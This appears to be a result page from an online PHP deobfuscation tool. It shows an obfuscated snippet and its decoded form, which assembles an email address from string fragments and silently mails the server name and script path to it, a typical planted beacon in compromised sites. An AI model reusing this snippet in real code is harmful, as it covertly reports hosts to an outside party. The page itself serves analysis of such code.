Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<? $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];$x0c="array ".$x0b;$x..

Decoded Output download

<?  $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];$x0c="array ".$x0b;$x0d=array("lt","svet","info","@","aine.");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); ?>

Did this file decode correctly?

Original Code

<?  $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];$x0c="array ".$x0b;$x0d=array("lt","svet","info","@","aine.");$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b); ?>

Function Calls

mail 1

Variables

$x0b NoneNone
$x0c array NoneNone
$x0d [{'key': 0, 'value': 'lt'}, {'key': 1, 'value': 'svet'}, {'key': 2, 'value': 'info'}, {'key': 3, 'value': '@'}, {'key': 4, 'value': 'aine.'}]
$x0e [email protected]
$x10 mail

Stats

MD5 c95c317d837c9a07d1187f725cc1bfea
Eval Count 0
Decode Time 93 ms